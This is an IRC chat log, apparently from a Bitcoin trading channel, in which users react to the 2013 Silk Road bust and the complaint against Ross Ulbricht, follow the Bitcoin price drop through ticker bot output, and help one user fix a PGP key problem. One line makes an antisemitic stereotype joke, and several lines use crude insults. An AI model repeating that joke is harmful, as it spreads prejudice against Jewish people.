[AM100] 14 @ 0.01197 = 0.1676 BTC [-] Oct 02 18:56:01 "Prices of hash on the street surges with Silk Road shutting down!" Oct 02 18:56:22 err i mean getting busted. Oct 02 19:06:30 DPR: "Not long ago, I had a clean hit done for $80k" ... Oct 02 19:09:19 where do you see this quote Oct 02 19:09:23 dude, if they start arresting all the kids claiming they're gangsta on the internets... Oct 02 19:09:31 reddit will be tumbleweed city. Oct 02 19:09:57 zoinky: page 23 of the pdf link, point m Oct 02 19:10:40 thanks Oct 02 19:11:00 AM pew pew Oct 02 19:11:07 almost below 1 @ havelock Oct 02 19:11:40 apparently btc selleoff has started Oct 02 19:11:57 btc selloff? Oct 02 19:12:04 ;;ticker Oct 02 19:12:05 MtGox BTCUSD ticker | Best bid: 136.25503, Best ask: 136.89974, Bid-ask spread: 0.64471, Last trade: 136.90477, 24 hour volume: 11219.84818691, 24 hour low: 136.20000, 24 hour high: 141.94997, 24 hour vwap: 139.22583 Oct 02 19:12:24 oh it's a gox ticker Oct 02 19:12:36 what about something relevant, bitstamp? Oct 02 19:13:22 2 btc lower then the high today I think Oct 02 19:19:27 this doc is really interesting to me, they even looked at his stackoverflow posts and found the code he posted there in the site's source Oct 02 19:19:59 [MPEX] [S.MPOE] 1200 @ 0.00091721 = 1.1007 BTC [+] Oct 02 19:20:07 lol judging by the pdf the stuff on sale on sr wasn't really pure Oct 02 19:20:23 everything's a "mixture containing detectable amts" Oct 02 19:25:53 ow yeah Oct 02 19:25:58 btc flash crash incomming Oct 02 19:26:24 just read the post about silk road Oct 02 19:26:31 get your buying engines ready Oct 02 19:29:11 ;;ticker Oct 02 19:29:12 MtGox BTCUSD ticker | Best bid: 136.00000, Best ask: 136.00999, Bid-ask spread: 0.00999, Last trade: 136.00000, 24 hour volume: 13288.94659517, 24 hour low: 136.00000, 24 hour high: 141.94997, 24 hour vwap: 138.77097 Oct 02 19:29:25 i guess this will be confirmation #2 i was right about sr's relative irrelevance : Oct 02 19:29:29 no particular crash. Oct 02 19:29:46 buttcoins will end up known as popescu's 100. Oct 02 19:30:43 that brings up a question, was atlantis a pure scam, did they get tipped off or just pussies or something else Oct 02 19:31:14 or a honeypot used to correlate sellers? Oct 02 19:31:22 who knows these things. Oct 02 19:31:25 Timing of Atlantis bailing seems really odd now Oct 02 19:31:29 o looky, the feds declare they made over 100 purchases. Oct 02 19:31:32 party in da bronx Oct 02 19:31:41 lol Oct 02 19:33:28 possible hoax? Oct 02 19:33:43 39 pages document doesn't look like a hoax Oct 02 19:33:55 oh they provided the filing? Oct 02 19:34:03 http://krebsonsecurity.com/wp-content/uploads/2013/10/UlbrichtCriminalComplaint.pdf Oct 02 19:34:26 thx Oct 02 19:34:50 https://mega.co.nz/#!pwkGkZDL!cNRLVQcm4CIuBIEimxkPLUfTZU9qs1wefSVWFICc66I mirror, if this one is too slow Oct 02 19:34:50 TAT_Investments it's legit. Oct 02 19:34:50 np :) Oct 02 19:34:51 MEGA Oct 02 19:35:12 also, bitcoin is "not in itself illegal and is known to have legitimate uses". Oct 02 19:35:36 this would be nice if it didn't use the exact same verbiage as used to describe tor, the honeypot network. Oct 02 19:35:45 but.. but.. "it's _designed_ for anonymous transactions" Oct 02 19:36:12 look at paragraph 22, they talk about how they "located a number of computer servers, ... associated with the operation of Silk Road". So, Tor = owned Oct 02 19:37:41 this is a well known fact. Oct 02 19:37:59 course internet ppls were bitching at me about tor coupla months back or w/e. Oct 02 19:38:04 but they were wrong! Oct 02 19:39:18 [BTCTC] [ASICMINER-PT] 1 @ 1.034 BTC [+] Oct 02 19:41:37 so what will the feds do with that BTC? Oct 02 19:41:55 pizzaman1337, wipe the wallet ? Oct 02 19:42:21 so BTC are "destroyed"? Oct 02 19:42:24 donate them to the EFF Oct 02 19:42:39 jack shit they can do, pretty much. Oct 02 19:42:43 pizzaman1337, these will be yeah i think Oct 02 19:42:54 like they would give a shit about them... Oct 02 19:43:27 this is going to be a pretty sad case once the da realises that he's going to be prosecuting an alleged 1bn+ criminal entreprise with exactly 0 confiscations. Oct 02 19:43:28 “When you interviewed [Ulbricht], he said he would never be arrested. But you can’t resist the FBI. We will find you.” dun dun dunnn... Oct 02 19:44:23 [BTCTC] [LABCOIN] 705 @ 0.0002111 = 0.1488 BTC [+] Oct 02 19:44:40 http://www.forbes.com/sites/andygreenberg/2013/10/02/end-of-the-silk-road-fbi-busts-the-webs-biggest-anonymous-drug-black-market/ Oct 02 19:44:40 End Of The Silk Road: FBI Busts The Web's Biggest Anonymous Drug Black Market - Forbes Oct 02 19:44:48 ;;ticker Oct 02 19:44:48 MtGox BTCUSD ticker | Best bid: 134.00000, Best ask: 134.09993, Bid-ask spread: 0.09993, Last trade: 134.09994, 24 hour volume: 21244.12621046, 24 hour low: 132.00000, 24 hour high: 141.94997, 24 hour vwap: 136.93504 Oct 02 19:45:16 like busting napster prolly. Oct 02 19:45:49 bitcoin - perpetual drama machine Oct 02 19:46:17 anyway. great thing honestly. i kinda liked the guy's ethos, but meh. had enough of junktards and their btc=pills bs. Oct 02 19:46:40 maybe it now gets through skulls that sr was not particularly relevant. Oct 02 19:48:03 fuck it Oct 02 19:48:15 the gox ticker looks strange Oct 02 19:48:25 dump Oct 02 19:49:06 http://i.imgur.com/BQiW242.png Oct 02 19:50:08 thats depressing Oct 02 19:50:46 http://www.linkedin.com/in/rossulbricht Oct 02 19:50:47 Ross Ulbricht | LinkedIn Oct 02 19:50:51 they come from the mpie next Oct 02 19:50:56 mpoe* Oct 02 19:51:29 [HAVELOCK] [CBTC] 1000 @ 0.00029 = 0.29 BTC [-] Oct 02 19:51:30 [BTCTC] [LABCOIN] 1000 @ 0.000192 = 0.192 BTC [-] Oct 02 19:52:09 haha this is precious Oct 02 19:52:30 [HAVELOCK] [CBTC] 5000 @ 0.00028005 = 1.4003 BTC [-] {6} Oct 02 19:52:31 [BTCTC] [LABCOIN] 713 @ 0.0001906 = 0.1359 BTC [-] {2} Oct 02 19:52:35 lmao, 150k or 300k ? 80k!!1 Oct 02 19:52:41 haggle of death! Oct 02 19:53:26 ;;google unintentionally entertain Oct 02 19:53:27 The 10 Best Unintentionally Hilarious Propaganda Videos: ; Review: Unfunny Undead Flick 'Harold's Going Stiff' Comes To Life ...: ; Unintentionally Terrifying Watch Out for These Accidental Horror (1 more message) Oct 02 19:53:31 [BTCTC] [LABCOIN] 2807 @ 0.0001904 = 0.5345 BTC [-] Oct 02 19:55:10 mircea_popescu, kid is serious heh Oct 02 19:59:43 i think its bad luck to have pirate in your name Oct 02 19:59:59 lol Oct 02 20:01:39 [HAVELOCK] [CBTC] 5765 @ 0.00028001 = 1.6143 BTC [-] {2} Oct 02 20:06:09 lol Oct 02 20:06:30 pirate specifically or p's in general ? Oct 02 20:06:44 [HAVELOCK] [CBTC] 1000 @ 0.00028 = 0.28 BTC [-] {2} Oct 02 20:07:45 [MPEX] [S.MPOE] 3119 @ 0.00091669 = 2.8592 BTC [-] {3} Oct 02 20:07:50 SR pwned Oct 02 20:08:03 DPR used his real name and email on the forums in a post a long time ago Oct 02 20:08:06 got pwned Oct 02 20:08:14 wow Oct 02 20:11:49 [BTCTC] [ASICMINER-PT] 69 @ 0.97522171 = 67.2903 BTC [-] {10} Oct 02 20:13:51 [BTCTC] [ASICMINER-PT] 81 @ 0.96135554 = 77.8698 BTC [-] {5} Oct 02 20:13:51 [HAVELOCK] [AM1] 5 @ 0.98 = 4.9 BTC [-] {4} Oct 02 20:14:53 [HAVELOCK] [AM100] 1000 @ 0.00984681 = 9.8468 BTC [-] {34} Oct 02 20:18:12 DPR used his real name and email on the forums in a post a long time ago < > Oct 02 20:18:14 ? Oct 02 20:18:45 paragraph 37+38 Oct 02 20:18:55 ;;ticker Oct 02 20:18:56 MtGox BTCUSD ticker | Best bid: 130.12200, Best ask: 130.51005, Bid-ask spread: 0.38805, Last trade: 130.12200, 24 hour volume: 25318.67401185, 24 hour low: 130.12200, 24 hour high: 141.94997, 24 hour vwap: 136.08809 Oct 02 20:19:03 is there any theymos pitchfork thread already? Oct 02 20:19:24 for not keeping btctalks userdata safe? xD Oct 02 20:19:57 [MPEX] [S.MPOE] 1483 @ 0.00091788 = 1.3612 BTC [+] {2} Oct 02 20:20:35 tbh i doubt it. Oct 02 20:20:37 damn guys Oct 02 20:20:40 this shit is crazy Oct 02 20:21:12 $25 spread between bitstamp and gox Oct 02 20:21:33 down she goes Oct 02 20:21:34 yep Oct 02 20:21:41 gox is money desperate to get out Oct 02 20:22:52 boom Oct 02 20:23:05 ;;ticker Oct 02 20:23:06 MtGox BTCUSD ticker | Best bid: 128.11200, Best ask: 128.89995, Bid-ask spread: 0.78795, Last trade: 128.11200, 24 hour volume: 28616.74916090, 24 hour low: 128.11201, 24 hour high: 141.94997, 24 hour vwap: 135.26952 Oct 02 20:23:17 hm delayed Oct 02 20:23:38 bs at 102, gox 125 Oct 02 20:24:26 ;;ticker Oct 02 20:24:27 MtGox BTCUSD ticker | Best bid: 125.15000, Best ask: 126.00000, Bid-ask spread: 0.85000, Last trade: 126.00000, 24 hour volume: 31233.82779834, 24 hour low: 125.15000, 24 hour high: 141.94997, 24 hour vwap: 134.55545 Oct 02 20:24:27 BTC crashing Oct 02 20:24:30 CRASHING Oct 02 20:24:32 yup Oct 02 20:25:17 ;;ticker Oct 02 20:25:32 MtGox BTCUSD ticker | Best bid: 125.10000, Best ask: 125.15000, Bid-ask spread: 0.05000, Last trade: 125.10000, 24 hour volume: 31556.58150277, 24 hour low: 125.02587, 24 hour high: 141.94997, 24 hour vwap: 134.46022 Oct 02 20:25:33 actm selloff at bf Oct 02 20:29:56 this is insanity lmao Oct 02 20:30:02 a sell at 122 and a buy at 125 within 2 seconds Oct 02 20:32:09 [MPEX] [O] [O.USD.P125T] 1 @ 0.48855451 BTC Oct 02 20:32:36 http://trilema.com/2013/law-enforcement-never-fails-to-unintentionally-entertain-part-2/ Oct 02 20:32:37 Law enforcement never fails to unintentionally entertain, part 2 pe Trilema - Un blog de Mircea Pope Oct 02 20:32:43 and nao we can put this sr drama behind us. Oct 02 20:33:10 [MPEX] [O] [O.USD.P125T] 1 @ 0.48855451 BTC Oct 02 20:33:10 [HAVELOCK] [VTX] 3 @ 0.4806 = 1.4418 BTC [+] Oct 02 20:34:11 [HAVELOCK] [VTX] 1 @ 0.4806 BTC [+] Oct 02 20:34:23 mircea_popescu: previous installment of this article -> "page not found" Oct 02 20:35:06 fxed ty Oct 02 20:35:12 also log link is erroneous Oct 02 20:35:40 omg Oct 02 20:36:39 aha better nao ty. Oct 02 20:37:14 [HAVELOCK] [CBTC] 5255 @ 0.000285 = 1.4977 BTC [+] Oct 02 20:38:55 lol Oct 02 20:39:16 [MPEX] [S.MPOE] 2700 @ 0.00091996 = 2.4839 BTC [+] Oct 02 20:39:17 [BTCTC] [ASICMINER-PT] 1 @ 0.9611 BTC [-] Oct 02 20:39:43 good night silk road Oct 02 20:40:17 [BTCTC] [BASIC-MINING] 3 @ 0.04883333 = 0.1465 BTC [+] {2} Oct 02 20:40:45 i'm wondering.. everywhere on sr they adviced to encrypt every pm etc., but the complaint often refers to the content of pms, even from dpr Oct 02 20:41:04 mircea_popescu: you are lucky I couldn't get my coinz out of JD in time to get puts.... Oct 02 20:41:18 [BTCTC] [BASIC-MINING] 8 @ 0.0549 = 0.4392 BTC [+] {2} Oct 02 20:41:23 o hey, when did you get out. Oct 02 20:42:15 hah ha Oct 02 20:42:18 :p Oct 02 20:42:19 [BTCTC] [ASICMINER-PT] 1 @ 0.9611 BTC [-] Oct 02 20:42:20 [BTCTC] [COGNITIVE] 4 @ 0.09 = 0.36 BTC [-] {2} Oct 02 20:43:20 [HAVELOCK] [VTX] 9 @ 0.4806 = 4.3254 BTC [+] Oct 02 20:43:43 argh. the puts were looking so juicy when I saw the first tweet. Doog is sleeping still.. Oct 02 20:44:18 https://bitcointalk.org/index.php?topic=242962.msg3282397#msg3282397 did you see this? Oct 02 20:44:20 rip bitcoin Oct 02 20:44:20 Just-Dice.com : Invest in 1% House Edge Dice Game Oct 02 20:44:23 if ucking bought on mtgox Oct 02 20:44:24 on the high Oct 02 20:44:27 i didn't read further because the sr stuff popped up Oct 02 20:44:31 well at least only like 30% of my capital Oct 02 20:44:32 but still Oct 02 20:44:42 and i missed the big shorting opportunity because i was too busy fapping Oct 02 20:45:39 the things I walk in on Oct 02 20:46:23 [BTCTC] [COGNITIVE] 6 @ 0.081 = 0.486 BTC [-] Oct 02 20:47:26 http://www.sierrachart.com/image.php?l=1380736028484.png Oct 02 20:48:25 [HAVELOCK] [VTX] 1 @ 0.4806 BTC [+] Oct 02 20:49:26 [BTCTC] [BASIC-MINING] 11 @ 0.0556 = 0.6116 BTC [+] Oct 02 20:50:27 [MPEX] [S.MPOE] 450 @ 0.00091913 = 0.4136 BTC [-] Oct 02 20:50:47 crashing. we're going to $20 Oct 02 20:51:17 oh shit Doog Oct 02 20:51:21 fuck an a Oct 02 20:51:25 it was inevitable Oct 02 20:52:26 lol all you ppl and your panicy inclinations. Oct 02 20:52:27 how much is SR propping up this market lol Oct 02 20:52:30 [HAVELOCK] [CBTC] 1000 @ 0.00029038 = 0.2904 BTC [+] Oct 02 20:52:31 [MPEX] [O] [O.USD.P125T] 10 @ 0.5149566 = 5.1496 BTC [+] Oct 02 20:53:14 Sell all the things! Oct 02 20:53:18 lol Oct 02 20:53:31 [HAVELOCK] [CBTC] 1191 @ 0.00029039 = 0.3459 BTC [+] {2} Oct 02 20:54:32 [HAVELOCK] [CBTC] 400 @ 0.00029039 = 0.1162 BTC [+] {2} Oct 02 20:55:14 So the mechs thing was a hoax or waht? Oct 02 20:55:57 mechs is DPR Oct 02 20:55:59 i dont know how much SR really props but i wouldnt be surprised if this wasnt just an excuse to help spark panic selling Oct 02 20:55:59 confirmed Oct 02 20:56:26 yeah people havent had an excuse to panic sell in a while, most of these people will buy back Oct 02 20:56:31 reverse gem Oct 02 20:56:35 [HAVELOCK] [HIM] 1 @ 0.14401 BTC [-] Oct 02 20:56:35 yep Oct 02 20:57:35 [HAVELOCK] [AM100] 40 @ 0.01099999 = 0.44 BTC [+] Oct 02 20:58:07 ;;ticker Oct 02 20:58:08 MtGox BTCUSD ticker | Best bid: 110.80000, Best ask: 110.99000, Bid-ask spread: 0.19000, Last trade: 111.02364, 24 hour volume: 54523.22940388, 24 hour low: 110.00000, 24 hour high: 141.94399, 24 hour vwap: 127.73235 Oct 02 20:58:32 This is bonkers! lol. Oct 02 20:58:35 oh man just noticed AM down to 0.96... soon back down to what I paid in lol fun times Oct 02 20:58:36 [BTCTC] [ASICMINER-PT] 65 @ 0.9611 = 62.4715 BTC [-] Oct 02 20:58:36 [HAVELOCK] [AM100] 40 @ 0.01099999 = 0.44 BTC [+] Oct 02 20:58:37 [HAVELOCK] [AM1] 1 @ 0.92 BTC [-] Oct 02 20:58:58 This is crashing faster than in April Oct 02 20:59:13 it's oversold, it really doesnt make sense Oct 02 20:59:28 yeah Namworld Oct 02 20:59:29 it's for a fundamental reason Oct 02 20:59:31 yeah, exchanges are more robust and can deal with the volume. Oct 02 20:59:36 not a technical one Oct 02 21:00:44 bgupta, bitstamp's engine is lagging as hell... Oct 02 21:00:48 bids higher than asks Oct 02 21:01:02 http://hover.ie/ Oct 02 21:01:39 [HAVELOCK] [AM100] 10 @ 0.01099999 = 0.11 BTC [+] Oct 02 21:01:40 [BTCTC] [ASICMINER-PT] 2 @ 0.9611 = 1.9222 BTC [-] Oct 02 21:01:45 price is turning Oct 02 21:02:15 dont call it an engine if its two cans and a string Oct 02 21:02:20 lol Oct 02 21:02:22 the cangine ? Oct 02 21:02:40 [BTCTC] [ASICMINER-PT] 1 @ 0.9611 BTC [-] Oct 02 21:02:54 mebbe Oct 02 21:03:57 with USD/BTC price falling, most of the 'assets' should be climbing Oct 02 21:04:11 why? Oct 02 21:04:22 levelling out at 85 Oct 02 21:04:28 for example: that rental place sells houses Oct 02 21:04:29 in USD Oct 02 21:04:33 it gets rent, in USD Oct 02 21:04:42 imsaguy yeah, and that's typical. Oct 02 21:04:46 so when you convert the USD to BTC, its more BTC Oct 02 21:04:54 divs should go up Oct 02 21:05:03 121 Oct 02 21:05:04 asset price should be climbing Oct 02 21:05:05 haha Oct 02 21:05:16 but they won't Oct 02 21:05:23 aka share prices are pegged to usd instead of btc (which i don't think is true) Oct 02 21:05:24 litecoin proves useless once again Oct 02 21:05:37 dexX7: because most investors are stupid Oct 02 21:05:42 [HAVELOCK] [AM1] 1 @ 0.99 BTC [+] Oct 02 21:05:43 [MPEX] [S.MPOE] 4150 @ 0.00091996 = 3.8178 BTC [+] Oct 02 21:05:45 imsaguy: Wll when btc crashes, it means folks are scrambling to get into fiat. so they sell b-a to get into btc to convert into fiat. Oct 02 21:05:56 yeah the recent LTC manipulation really fucked this up Oct 02 21:06:10 ltc is still a thing? Oct 02 21:06:22 arguably. Oct 02 21:06:28 lol Oct 02 21:06:29 is nmc still a thing? Oct 02 21:07:08 yes Oct 02 21:07:40 just remember kids: don't buy fake ids. it ruins your million dollar enterprise. Oct 02 21:07:44 [HAVELOCK] [CFIG] 55 @ 0.10306382 = 5.6685 BTC [-] {6} Oct 02 21:07:45 well, and don't sell murder. Oct 02 21:07:54 that's just stupid. Oct 02 21:12:49 [BTCTC] [LABCOIN] 23083 @ 0.00019026 = 4.3918 BTC [-] {5} Oct 02 21:16:53 [HAVELOCK] [AM100] 10 @ 0.011 = 0.11 BTC [+] Oct 02 21:22:59 [BTCTC] [FN] [DMS.PURCHASE] 50 @ 0.005017 = 0.2509 BTC [-] Oct 02 21:23:07 hello Oct 02 21:23:22 hello there Oct 02 21:24:00 [HAVELOCK] [AM1] 2 @ 1.14999999 = 2.3 BTC [+] Oct 02 21:24:37 I was on my coinbr account and am not seeing any available prices despite seeing a live orderbook on mpex.co which has not happened to me before. Curious if any comments available? Oct 02 21:24:59 ping jurov Oct 02 21:25:01 [HAVELOCK] [AM1] 3 @ 1.14999999 = 3.45 BTC [+] Oct 02 21:25:03 [BTCTC] [ASICMINER-PT] 3 @ 0.965 = 2.895 BTC [+] Oct 02 21:26:02 [BTCTC] [ASICMINER-PT] 1 @ 0.965 BTC [+] Oct 02 21:26:59 thanks, just did. he seems away Oct 02 21:27:03 [BTCTC] [ASICMINER-PT] 1 @ 0.965 BTC [+] Oct 02 21:27:42 lmao that was all ? bacxk to 110 or w/e ? Oct 02 21:27:48 oh but allow me to rub in in! Oct 02 21:28:04 [BTCTC] [ASICMINER-PT] 3 @ 0.965 = 2.895 BTC [+] {3} Oct 02 21:28:31 http://bash.bitcoin-assets.com/ is a nice addition :) Oct 02 21:28:32 #bitcoin-assets bash Oct 02 21:29:41 wanted to add some mpoe shares.. Oct 02 21:30:42 bitesak im sure jurov will sort you out asap. Oct 02 21:32:36 bitesak, i hear you...lemme see Oct 02 21:32:44 a few months ago he sorted me out in a few minutes, so I am inclined to expect the same indeed Oct 02 21:33:20 bitesak apparently it made some people mad cause and they ragevoted Oct 02 21:33:35 -and or -cause Oct 02 21:37:13 [MPEX] [S.MPOE] 2051 @ 0.00091668 = 1.8801 BTC [-] {3} Oct 02 21:38:14 [MPEX] [S.MPOE] 562 @ 0.00091483 = 0.5141 BTC [-] Oct 02 21:38:14 [BTCTC] [LABCOIN] 3005 @ 0.00019 = 0.571 BTC [-] {2} Oct 02 21:40:35 mircmircea_popescu thanks. On another note, curious if you get solicitations/requests for new listings on mpex.co that are turned down or you just don't get any all together? Oct 02 21:42:39 i get plenty, but very few that are workable. Oct 02 21:44:20 [HAVELOCK] [AM100] 52 @ 0.01015577 = 0.5281 BTC [-] {2} Oct 02 21:44:25 http://www.businessinsider.com/they-are-watching-bitcoin-users-are-freaking-out-about-the-arrest-of-the-alleged-founder-of-silk-road-2013-10 Oct 02 21:44:26 'THEY ARE WATCHING': Bitcoin Users Are Freaking Out About The Arrest Of The Alleged Founder Of Silk Oct 02 21:45:16 lol. Oct 02 21:45:32 decisions made in panic rarely work out as hoped Oct 02 21:45:39 the media. "o huge news". nobody cares. " omg the people are fereaking out because of our huge news". derp. Oct 02 21:45:43 some crash that was Oct 02 21:46:00 TAT_Investments it went to 20!!1 Oct 02 21:46:06 I do admit I was a bit terrified since I'm sitting on 100 BTC Oct 02 21:46:11 the forum pitchforks Oct 02 21:46:15 but, looks like it all went ok, seems to be normalising at 110 now? Oct 02 21:46:15 oh how i love it Oct 02 21:46:22 [MPEX] [S.MPOE] 578 @ 0.00091483 = 0.5288 BTC [-] Oct 02 21:46:25 I called both bottoms like a champ :) Oct 02 21:47:34 so BI just links to questionable forum posts now and reddit threads and that is considered vetted sources Oct 02 21:47:45 Azelphur if it makes you feel any better i sit on more. Oct 02 21:47:47 jcpham yes. Oct 02 21:47:58 mircea_popescu: I bet :) Oct 02 21:48:03 standard operating procedure i see Oct 02 21:48:10 just type it up and click publish Oct 02 21:49:26 mtgoy and bitstamp nearly have the same price ! Oct 02 21:49:37 lol at them quoting VolcanicEruptor Oct 02 21:49:52 watch out if stamp crosses gox Oct 02 21:49:56 isnt he like a Labcoin/ActM investor? Oct 02 21:50:01 bitesak: lol best typo ever Oct 02 21:50:03 "mtgoy" Oct 02 21:50:21 lmao Oct 02 21:50:28 yes, by all means, let's quote activemining and labcoin investors Oct 02 21:50:34 this is good judgement Oct 02 21:50:43 im sorry i don't have an exchange and im not jewish, for else i'd be using it. Oct 02 21:50:59 jcpham what judgement. it's body idour or w/e bi stands for. Oct 02 21:51:38 i'm in this webirc chat and have "done" covering my first word. Now I know why Oct 02 21:51:54 http://imgur.com/quEjWDh Oct 02 21:51:56 imgur: the simple image sharer Oct 02 21:52:27 lol Oct 02 21:52:37 http://www.thedrinkingrecord.com/2013/10/02/silk-road-closure-not-unexpected/ Oct 02 21:52:39 Silk Road Closure: Not Unexpected | Bingo Blog Oct 02 21:54:03 given the extreme levels of retardation displayed in that complaint, the notion is starting to form that what if they got the wrong guy as part of the largest trollexperiment 4chan ever created. Oct 02 21:54:15 bitesak: coinbr is down, sorry, will be up in 2 minutes Oct 02 21:55:06 so coinbr was hosted on silk road's server Oct 02 21:55:07 interesting Oct 02 21:55:14 lol Oct 02 21:55:49 mircea_popescu: are you serious? Oct 02 21:56:07 if you read the complaint, its obvious that its him. Oct 02 21:56:11 logic. Oct 02 21:56:39 dexX7 yes. Oct 02 21:57:13 fractal_ based on the agent's training and experience, it's shocking to discover no murder took place in canada contrary to some internet dorks said on the web. Oct 02 21:57:34 but that leaves only 2 options, sr is the gov and is shutdown for that reason or he is a part of the joke Oct 02 21:57:39 which is more unlikley Oct 02 21:58:09 uh oh Oct 02 21:58:10 kakobrekla i suppose the only way to further humiliate the govt after having run sr for two years, is to bring it back online monday with a "haha only kidding" Oct 02 21:58:11 the hit was FAKE.... the blackmailer was the hitman.... Oct 02 21:58:15 pankkake: lol Oct 02 21:58:17 today is the 10th birthday of 4chan Oct 02 21:58:17 fractal_ duh. Oct 02 21:58:26 but that leaves only 2 options, sr is the gov and is shutdown <<< i like this theory, NASA website is down at same time, coincidence?! Oct 02 21:58:47 mind you, i'm not proposing this is a fact or anything. just... it gets you thinking. Oct 02 21:58:50 yeah all these gov sites are down Oct 02 21:58:54 i've never seen agents this stupid. not even in america. Oct 02 21:59:27 I doubt it will come back. remember Atlantis? They probably tried the same things Oct 02 21:59:37 but the atlantis guy was smarter Oct 02 21:59:56 i don't think anyone sane would use it if it came back anyway. Oct 02 21:59:58 jurox: okidoki, thanks for the notice Oct 02 22:00:02 Regarding the 'hit'... it doesnt make sense... DPR asks the blackmailers creditors to 'off him' ? obviously the hitman == the blackmailer. Oct 02 22:00:03 yeah Oct 02 22:00:05 then again... not that many sane people in bitcoin. or on drugs. Oct 02 22:00:07 jurov: thanks !! Oct 02 22:00:10 is BMR still going? Oct 02 22:00:12 i think it is time for the clones to enter Oct 02 22:00:20 TAT_Investments: yes Oct 02 22:00:22 mjr_ how's panama Oct 02 22:00:25 great Oct 02 22:00:30 loving it so far Oct 02 22:00:34 i thought they had your banks shut down for a week or w/e Oct 02 22:00:36 started our first satoshi square down here Oct 02 22:00:37 and "sheep market" Oct 02 22:00:42 not that i have seen Oct 02 22:00:56 i went to an atm to try and get a pic of the bank holiday Oct 02 22:00:59 but it gave me money Oct 02 22:01:20 in fact, i walked with someone who withdrew $1000 in order to buy bitcoin Oct 02 22:01:58 oddness. Oct 02 22:02:39 [MPEX] [O] [O.USD.P125T] 4 @ 0.05532317 = 0.2213 BTC [-] Oct 02 22:03:44 yep, very odd Oct 02 22:04:38 bitesak: we're back, with price display Oct 02 22:04:40 [MPEX] [S.MPOE] 2600 @ 0.00091996 = 2.3919 BTC [+] Oct 02 22:04:41 [BTCTC] [PETA-MINE] 9 @ 0.6 = 5.4 BTC [-] Oct 02 22:05:56 did that just sell for .05 ?! Oct 02 22:05:58 no help for silk road, tho... i had to cut it away when feds came Oct 02 22:06:21 jurov: indeed !!, thank you for your tip top service Oct 02 22:06:34 ;;ticker Oct 02 22:06:34 MtGox BTCUSD ticker | Best bid: 126.11000, Best ask: 126.99000, Bid-ask spread: 0.88000, Last trade: 126.98000, 24 hour volume: 88702.50327367, 24 hour low: 109.70000, 24 hour high: 141.94399, 24 hour vwap: 125.00818 Oct 02 22:06:36 ;;nethash Oct 02 22:06:36 1344036.07003 Oct 02 22:06:42 [BTCTC] [DMS.MINING] 589 @ 0.00118188 = 0.6961 BTC [-] {4} Oct 02 22:06:42 [MPEX] [S.MPOE] 6500 @ 0.00091432 = 5.9431 BTC [-] {4} Oct 02 22:06:44 ;;bcstats Oct 02 22:06:47 Current Blocks: 261321 | Current Difficulty: 1.4881919980509263E8 | Next Difficulty At Block: 262079 | Next Difficulty In: 758 blocks | Next Difficulty In About: 4 days, 7 hours, 57 minutes, and 15 seconds | Next Difficulty Estimate: 180501777.787 | Estimated Percent Change: 21.28931 Oct 02 22:06:56 not even sure if this will register on the 24 hour Oct 02 22:12:43 mp,are you there? Oct 02 22:13:12 I still cant use my key~~~~ Oct 02 22:13:36 mircea_popescu *ping* Oct 02 22:14:29 sup Oct 02 22:14:47 what's it say ? Oct 02 22:15:42 Unrecognized signature. Please email your public key first Oct 02 22:15:50 are you using the new mpex key ? Oct 02 22:16:13 I think so Oct 02 22:16:43 when did you start the new key? Oct 02 22:16:45 use the !mp command for a stat to see. Oct 02 22:16:49 do you know how to do that ? Oct 02 22:17:12 nope have no idea Oct 02 22:17:17 teach me Oct 02 22:18:38 you sign a STAT, then encrypt it as normal, then go to http://dpaste.com/ and paste it in there Oct 02 22:18:47 then you go !mp http://dpaste.com/somecode Oct 02 22:18:54 [MPEX] [S.MPOE] 1665 @ 0.00091996 = 1.5317 BTC [+] Oct 02 22:20:20 then you go !mp http://dpaste.com/somecode Oct 02 22:20:27 what is this mean Oct 02 22:21:09 !mp http://dpaste.com/somecode Oct 02 22:21:10 Processing. Oct 02 22:21:12 Response: http://dpaste.com/1403875/plain/ Oct 02 22:21:48 I paste it in there,then i do what? Oct 02 22:21:54 what should i press Oct 02 22:22:56 "paste it" Oct 02 22:22:59 then copy the url Oct 02 22:22:59 copy the url Oct 02 22:23:35 okay did that Oct 02 22:23:39 then? Oct 02 22:23:48 !mp Oct 02 22:23:49 Please use http://dpaste.com/ Oct 02 22:24:11 best title for the post on reddit Oct 02 22:24:20 napster is down - this is the END of illegal file sharing Oct 02 22:24:22 !mp http://dpaste.com/1403877/ Oct 02 22:24:22 Processing. Oct 02 22:24:24 Response: http://dpaste.com/1403878/plain/ Oct 02 22:24:35 lol mjr_ Oct 02 22:24:39 Unrecognized signature. Please email your public key first. Oct 02 22:24:41 still Oct 02 22:25:00 you are using the old mpex key. please update to the new one. Oct 02 22:25:10 I used the mpex key created at 2013 02 11 Oct 02 22:25:28 where is the new one? Oct 02 22:25:32 http://trilema.com/2013/mpex-status-report/ Oct 02 22:25:34 MPEx - Status Report pe Trilema - Un blog de Mircea Popescu. Oct 02 22:25:36 part II Oct 02 22:26:03 evil mp makes you pay a credit for new key Oct 02 22:26:29 lol. gotta make ends meet Oct 02 22:26:31 http://pgp.mit.edu:11371/pks/lookup?op=vindex&search=0x2EE93869A57D509A Oct 02 22:26:32 Search results for '0x2ee93869a57d509a' Oct 02 22:26:46 just trollin Oct 02 22:29:04 [HAVELOCK] [LABCO] 955 @ 0.0002 = 0.191 BTC [-] {2} Oct 02 22:29:24 where does one get those complimentary mpex keys Oct 02 22:32:20 ;;goxlag Oct 02 22:32:22 MtGox lag is 0.626129 seconds. During this time, light travels 0.00125475550551 AU. You could have sent a bitcoin to the other side of the Earth, along the surface (0.0001339 AU). Oct 02 22:32:39 KRS1, ask mircea. but they don't support withdrawals Oct 02 22:33:35 KRS1 they're for sale on sr. Oct 02 22:39:35 haha Oct 02 22:40:15 [BTCTC] [LABCOIN] 26139 @ 0.00019081 = 4.9876 BTC [-] {5} Oct 02 22:41:54 sub .0002 Oct 02 22:43:03 this seems so fueled/manufactured again.. the reddit "summary threads" are super loaded/exaggerated and made by day 1 posters with names like "sr_downfall".. then: lags, bad gateways and timeouts on bitcoin related websites.. and of course right before everything explodes: http://imgur.com/rC34KDS Oct 02 22:43:07 Advertised Silk Road days after it.s launch on drug forums and bitcointalk.org with the username .altoid.. 8 months later he used this username looking for developers and included his personal email (rossulbricht@gmail.com) in the message. Oct 02 22:43:11 Using records from a seized webserver, the FBI agent subpoena.d his way back through a private VPN server to an IP address at a coffee shop on Laguna street in San Francisco. This happened to be 500 feet away from the house of one on Ross Ulbricht.s friends. Oct 02 22:43:14 http://www.shroomery.org/forums/showflat.php/Number/13860995 Oct 02 22:43:15 anonymous market online? - Science and Technology - Shroomery Message Board Oct 02 22:43:16 US Customs intercepted a package containing 